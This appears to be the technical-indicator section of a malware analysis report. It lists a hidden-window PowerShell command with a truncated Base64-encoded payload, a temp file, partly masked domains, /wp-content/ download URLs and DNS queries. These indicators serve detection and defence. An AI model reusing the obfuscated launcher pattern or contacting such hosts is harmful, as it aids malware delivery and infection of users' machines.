Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGYAaAByAG0AaABzAHMAcQBxAGkAaQBnAD0AJwBCAHIAdABmAHcAcABjAGcAYgBjACcAOwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQAgAD0AIAAnADIANwAwACcAOwAkAEkAbQBnAHoAYgBvAGQAbABoAD0AJwBVAHIAeQB6AGEAdAByAGQAcQBsAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1090056.cvr
- 'ad###ilt15.com':80
- 'an##.or.jp':443
- 'me#####supplements.com':443
- 'vf##ool.com':443
- http://ad###ilt15.com/wp-content/INy1yG/
- http://www.ad###ilt15.com/wp-content/INy1yG/
- 'an##.or.jp':443
- 'me#####supplements.com':443
- 'vf##ool.com':443
- DNS ASK ad###ilt15.com
- DNS ASK an##.or.jp
- DNS ASK me#####supplements.com
- DNS ASK ka###ngdian.com
- DNS ASK vf##ool.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGYAaAByAG0AaABzAHMAcQBxAGkAaQBnAD0AJwBCAHIAdABmAHcAcABjAGcAYgBjACcAOwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQAgAD0AIAAnADIANwAwACcAOwAkAEkAbQBnAHoAYgBvAGQAbABoAD0AJwBVAHIAeQB6AGEAdAByAGQAcQBsAC...' (with hidden window)